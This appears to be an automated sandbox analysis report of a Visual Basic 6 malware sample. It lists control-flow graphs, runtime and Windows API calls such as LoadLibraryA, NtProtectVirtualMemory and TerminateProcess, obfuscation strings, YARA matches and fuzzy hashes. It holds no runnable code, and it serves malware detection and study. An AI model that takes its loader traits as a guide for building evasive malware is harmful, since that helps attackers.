                                                                                                                                                      control_flow_graph 53 2b3fae6-2b3fb16 54 2b3fb19-2b3fb9e 53->54 56 2b3fba4-2b3fbb4 54->56 57 2b3fd58-2b3fd5c 54->57 58 2b3f7b6-2b3f7e9 56->58 59 2b3fbba-2b3fbc8 56->59 60 2b3f7ef-2b3f880 58->60 61 2b3146e-2b314d9 call 2b31204 58->61 59->57 62 2b3fbce-2b3fbfc 59->62 67 2b3f882-2b3f8ae call 2b401bf call 2b3f91f 60->67 68 2b3f8ba-2b3f8c5 LoadLibraryA call 2b3f91f 60->68 61->58 62->58 65 2b3fc02-2b3fc15 62->65 65->57 69 2b3fc1b-2b3fc92 65->69 84 2b43d15-2b43d1c 67->84 85 2b3f8b4-2b3f8b5 67->85 74 2b3f8ca-2b3f919 68->74 69->57 73 2b3fc98-2b3fcf2 69->73 82 2b314d1-2b314d9 73->82 83 2b3fcf8-2b3fd0b 73->83 82->58 83->54 86 2b3fd11-2b3fd55 83->86 88 2b43d1d-2b43d58 84->88 85->68 88->88 89 2b43d5a-2b43d5f 88->89
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: 94fdfe8e9c27443ee72308901797c209ba4ad4d99c000534f351778fd4b803e6
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: D8612B75B4138A5FEF359D748DA43FA36535F633A0FA8426ECC864B284DB358985CB01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B42897, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 140 2b42897-2b42955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02B42953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 7754cd14195b7f749237db44177a12d1bbfe366e29564febc218dff49e4ab621
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: 660169B02482459FEB28DE28DD487EAB7E7AFD4300F45842DAC899B204CB70AE45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041C620, Relevance: 180.8, APIs: 75, Strings: 28, Instructions: 578COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 41c620-41c6ea #527 __vbaStrMove __vbaStrCmp __vbaFreeStr 2 41c6f0-41c7c4 __vbaVarDup #513 #717 __vbaVar2Vec __vbaAryMove __vbaFreeVarList __vbaVarDup #520 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 0->2 3 41c7c7-41c7d2 0->3 2->3 5 41c7d4-41c7e0 __vbaHresultCheckObj 3->5 6 41c7e6-41c7f9 3->6 5->6 7 41ce73 6->7 8 41c7ff-41c812 #564 6->8 7->7 9 41c814-41c815 __vbaHresultCheck 8->9 10 41c81b-41c85a __vbaI4Var call 41d820 8->10 9->10 12 41c85c-41c868 __vbaHresultCheckObj 10->12 13 41c86e-41c8de __vbaFreeVarList #574 __vbaStrMove __vbaStrCopy __vbaStrMove 10->13 12->13 15 41c8e0-41c8ec __vbaHresultCheckObj 13->15 16 41c8f2-41c9ec __vbaFreeStrList __vbaFreeVar __vbaVarDup #617 __vbaVarDup #524 #696 __vbaStrVarMove __vbaStrMove __vbaStrVarVal 13->16 15->16 18 41ca00-41ca6a __vbaFreeStrList __vbaFreeVarList __vbaStrCopy * 2 16->18 19 41c9ee-41c9fa __vbaHresultCheckObj 16->19 22 41ca6c-41ca78 __vbaHresultCheckObj 18->22 23 41ca7e-41cb36 __vbaFreeStrList #572 __vbaStrMove #696 #704 __vbaStrMove * 2 #696 18->23 19->18 22->23 25 41cb38-41cb44 __vbaHresultCheckObj 23->25 26 41cb4a-41cc5c __vbaFreeStrList __vbaFreeVarList #692 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeVar __vbaLenBstrB 23->26 25->26 30 41cc70-41ccbb #581 __vbaFpI4 26->30 31 41cc5e-41cc6a __vbaHresultCheckObj 26->31 33 41ccd3 30->33 34 41ccbd-41ccd1 __vbaHresultCheckObj 30->34 31->30 35 41ccd9-41cd6f #714 #648 __vbaStrCopy __vbaLenBstrB __vbaI4Var 33->35 34->35 37 41cd71-41cd7d __vbaHresultCheckObj 35->37 38 41cd7f-41cdb1 __vbaFreeStr __vbaFreeVarList 35->38 37->38 40 41cdc1-41cde9 38->40 41 41cdb3-41cdbf __vbaHresultCheckObj 38->41 42 41cdf0-41ce53 __vbaAryDestruct __vbaFreeStr 40->42 41->40
                                                                                                                                                      APIs
                                                                                                                                                      • #527.MSVBVM60(Whigling), ref: 0041C6B5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C6C6
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Unpitying,00000000), ref: 0041C6CE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041C6E1
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C713
                                                                                                                                                      • #513.MSVBVM60(?,?,00000099), ref: 0041C722
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041C737
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041C748
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041C759
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041C76D
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C793
                                                                                                                                                      • #520.MSVBVM60(?,?), ref: 0041C79D
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041C7A7
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C7B2
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041C7BE
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,000006F8), ref: 0041C7E0
                                                                                                                                                      • #564.MSVBVM60(?,?), ref: 0041C80A
                                                                                                                                                      • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041C815
                                                                                                                                                      • __vbaI4Var.MSVBVM60(?), ref: 0041C829
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,000006FC), ref: 0041C868
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 0041C878
                                                                                                                                                      • #574.MSVBVM60(00000005), ref: 0041C893
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C89E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041C8A8
                                                                                                                                                      • __vbaStrMove.MSVBVM60(Kaleches4,?,UNFREEZABLE,000043EE), ref: 0041C8D2
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000700), ref: 0041C8EC
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C900
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041C90C
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C935
                                                                                                                                                      • #617.MSVBVM60(?,00000003,00000092), ref: 0041C944
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041C967
                                                                                                                                                      • #524.MSVBVM60(?,?), ref: 0041C971
                                                                                                                                                      • #696.MSVBVM60(Erikka3), ref: 0041C97C
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041C996
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041C9A1
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?,?,00006066,?,?), ref: 0041C9D0
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000704), ref: 0041C9FA
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CA10
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000003,?,?,?), ref: 0041CA24
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CA3E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CA4C
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000708), ref: 0041CA78
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CA88
                                                                                                                                                      • #572.MSVBVM60(00000003), ref: 0041CA9F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAAA
                                                                                                                                                      • #696.MSVBVM60(00000000), ref: 0041CAB3
                                                                                                                                                      • #704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041CAD5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAE0
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CAEF
                                                                                                                                                      • #696.MSVBVM60(DESCARTES), ref: 0041CB08
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,0000070C), ref: 0041CB44
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CB5E
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000002,00000003), ref: 0041CB6A
                                                                                                                                                      • #692.MSVBVM60(00000002,taxachauffrens,diaphanous), ref: 0041CB81
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(00000002), ref: 0041CB95
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041CBA0
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CBBE
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CBF9
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041CC01
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Deklareret9,?), ref: 0041CC2F
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000710), ref: 0041CC6A
                                                                                                                                                      • #581.MSVBVM60(ALLEGATE), ref: 0041CC75
                                                                                                                                                      • __vbaFpI4.MSVBVM60(0037189C), ref: 0041CCA4
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000714), ref: 0041CCCF
                                                                                                                                                      • #714.MSVBVM60(00000003,00000002,00000000), ref: 0041CCF1
                                                                                                                                                      • #648.MSVBVM60(?), ref: 0041CD09
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041CD23
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Lubriciousness6), ref: 0041CD2E
                                                                                                                                                      • __vbaI4Var.MSVBVM60(00000003,?,0000349B,00001C15), ref: 0041CD4E
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,00000718), ref: 0041CD7D
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041CD82
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000004,0000000A,00000003), ref: 0041CD96
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402D30,0000071C), ref: 0041CDBF
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041CE54), ref: 0041CE44
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041CE4D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresultList$Copy$#696$Bstr$#513#520#524#527#564#572#574#581#617#648#692#704#714#717DestructVar2
                                                                                                                                                      • String ID: -W$ALLEGATE$BENTJERS$DESCARTES$Deklareret9$Erikka3$Jeepers$Kaleches4$Lubriciousness6$NONCOME$Nightwalker8$Oprettelsesdokument$PRINTERNE$Quininise$TIDSSKRIFTSAMLINGEN$UNFREEZABLE$Unbrilliantly8$Unpitying$Whigling$basilian$diaphanous$emmik$f`$hajjs$halvtidsstillingens$napaea$taxachauffrens$~frK
                                                                                                                                                      • API String ID: 444667331-2328328339
                                                                                                                                                      • Opcode ID: 1d3c5c00303d28c848d67d71f0904335bdc985bb608c71b27c401fb671b5cf8b
                                                                                                                                                      • Instruction ID: 434935850d97dffaefdd917fc2412d8309072782fcf7341b7752f2bb129f091b
                                                                                                                                                      • Opcode Fuzzy Hash: 1d3c5c00303d28c848d67d71f0904335bdc985bb608c71b27c401fb671b5cf8b
                                                                                                                                                      • Instruction Fuzzy Hash: 60324E71900218AFDB14DFA0DD88FEEBBB9FF48301F00856AE649B6190DB745A49CF65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041D820, Relevance: 80.8, APIs: 40, Strings: 6, Instructions: 254COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041D8A5
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041D8C8
                                                                                                                                                      • #547.MSVBVM60(?,?), ref: 0041D8D6
                                                                                                                                                      • __vbaVarTstGt.MSVBVM60(?,?), ref: 0041D8FB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041D913
                                                                                                                                                      • #537.MSVBVM60(000000A3), ref: 0041D926
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D937
                                                                                                                                                      • #525.MSVBVM60(00000027), ref: 0041D93B
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D946
                                                                                                                                                      • #689.MSVBVM60(Silkwoman8,Delen1,Reduktionsventilernes), ref: 0041D989
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D994
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001,000000FF,00000000), ref: 0041D9B0
                                                                                                                                                      • __vbaStrMove.MSVBVM60(Socialdemokratis,00000000), ref: 0041D9C1
                                                                                                                                                      • #712.MSVBVM60(00000000), ref: 0041D9C4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041D9CF
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041D9EF
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041DA00
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041DA11
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041DA2D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041DA3D
                                                                                                                                                      • #583.MSVBVM60(93200000,4202A390), ref: 0041DA54
                                                                                                                                                      • __vbaFpR8.MSVBVM60 ref: 0041DA5A
                                                                                                                                                      • #717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041DA92
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DA9C
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DAA7
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041DAAC
                                                                                                                                                      • #572.MSVBVM60(?), ref: 0041DAC4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DACF
                                                                                                                                                      • #629.MSVBVM60(?,?,0000002B,?), ref: 0041DB00
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041DB0D
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041DB18
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DB1D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,00000002,?), ref: 0041DB38
                                                                                                                                                      • __vbaR8IntI4.MSVBVM60 ref: 0041DB43
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041DBCF), ref: 0041DBAB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBB6
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041DBBD
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBC2
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBC7
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041DBCC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Move$Free$List$#717Destruct$#525#537#547#572#583#629#689#712CopyVar2
                                                                                                                                                      • String ID: 17:17:17$Delen1$Reduktionsventilernes$Silkwoman8$Socialdemokratis$h
                                                                                                                                                      • API String ID: 329208838-924080792
                                                                                                                                                      • Opcode ID: 89f28d305fc2863e44cd3fb68e1f09f2f92a7cfaf4c206c2d5d5194f54272655
                                                                                                                                                      • Instruction ID: 2403ab01fecffa5206d054a683c68b1bc80a6c6a0118f5589a4603fc6346af2e
                                                                                                                                                      • Opcode Fuzzy Hash: 89f28d305fc2863e44cd3fb68e1f09f2f92a7cfaf4c206c2d5d5194f54272655
                                                                                                                                                      • Instruction Fuzzy Hash: 9CB1E6B1D00259EBDB04DF95DD84ADEFBB8FF88300F10815AE50AA7264DB745A89CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B3F7B6, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 90 2b3f7b6-2b3f7e9 91 2b3f7ef-2b3f880 90->91 92 2b3146e-2b314d9 call 2b31204 90->92 96 2b3f882-2b3f8ae call 2b401bf call 2b3f91f 91->96 97 2b3f8ba-2b3f919 LoadLibraryA call 2b3f91f 91->97 92->90 107 2b43d15-2b43d1c 96->107 108 2b3f8b4-2b3f8b5 96->108 109 2b43d1d-2b43d58 107->109 108->97 109->109 110 2b43d5a-2b43d5f 109->110
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction ID: 1e5cad1b65c06e5eceffbd155c5fa2ad77a790213e7f5f1611dbef94295212ad
                                                                                                                                                      • Opcode Fuzzy Hash: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction Fuzzy Hash: 85314976B80248DFDB289E64DC943ED7BA6EF977A0F38016CDD459B200D7318986CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B3F1C0, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 111 2b3f1c0-2b3f270 113 2b3f7b6-2b3f7e9 111->113 114 2b3f276-2b3f284 111->114 115 2b3f7ef-2b3f880 113->115 116 2b3146e-2b314d9 call 2b31204 113->116 114->113 121 2b3f882-2b3f8ae call 2b401bf call 2b3f91f 115->121 122 2b3f8ba-2b3f919 LoadLibraryA call 2b3f91f 115->122 116->113 132 2b43d15-2b43d1c 121->132 133 2b3f8b4-2b3f8b5 121->133 134 2b43d1d-2b43d58 132->134 133->122 134->134 135 2b43d5a-2b43d5f 134->135
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02B3F8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction ID: f3a937b789ad46b74a27312d894fe30d7c37e40cee42cd9a48983535ecf38866
                                                                                                                                                      • Opcode Fuzzy Hash: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction Fuzzy Hash: 5E313136B443499FDF349E249D947EE37A7AF967A0F54012EDC498B200D7318E46CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B33C3F, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 136 2b33c3f-2b3c3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02B3C3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      • Opcode ID: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction ID: 71ae51654bf8486ff2714de3acef6584bba90b80be3bdcea99474217b8e7e9cf
                                                                                                                                                      • Opcode Fuzzy Hash: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction Fuzzy Hash: A9F02871244782CFCB308EA48DE5BDE37669FCA244F80D169DD454A14AD3350980C606
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004016A4, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 142 4016a4-4016c0 #100
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: #100
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1341478452-0
                                                                                                                                                      • Opcode ID: 3c57d615471b6c7d1088c5b98921e224eb897f51fa16e0fe36aa961655358234
                                                                                                                                                      • Instruction ID: 8cfff0b7e639d61b50d7d96f92ce28db2f78f4f5273ee5f6caa298a964b0a042
                                                                                                                                                      • Opcode Fuzzy Hash: 3c57d615471b6c7d1088c5b98921e224eb897f51fa16e0fe36aa961655358234
                                                                                                                                                      • Instruction Fuzzy Hash: DED0B69150F3C15FC3076370496601A2F340C0360030F04E7D080DF0F394690848C33A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 02B3FFB4, Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: S$rQs
                                                                                                                                                      • API String ID: 0-2746945112
                                                                                                                                                      • Opcode ID: 579867b717e927b059780fb3d718e6b92a597d1fdb9db158ef5102aa075b088a
                                                                                                                                                      • Instruction ID: 11381c6a5b78a22137e068782fcd89ce7458b2cc9b9ea404aa89c51c50ed66e3
                                                                                                                                                      • Opcode Fuzzy Hash: 579867b717e927b059780fb3d718e6b92a597d1fdb9db158ef5102aa075b088a
                                                                                                                                                      • Instruction Fuzzy Hash: 11310B3560435A9FDB34AE7888D03D723F2EF1B790FC9456EDD8A97241EB204846C741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02B41DFF, Relevance: .2, Instructions: 225COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2b30000_BL_CI_PL.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
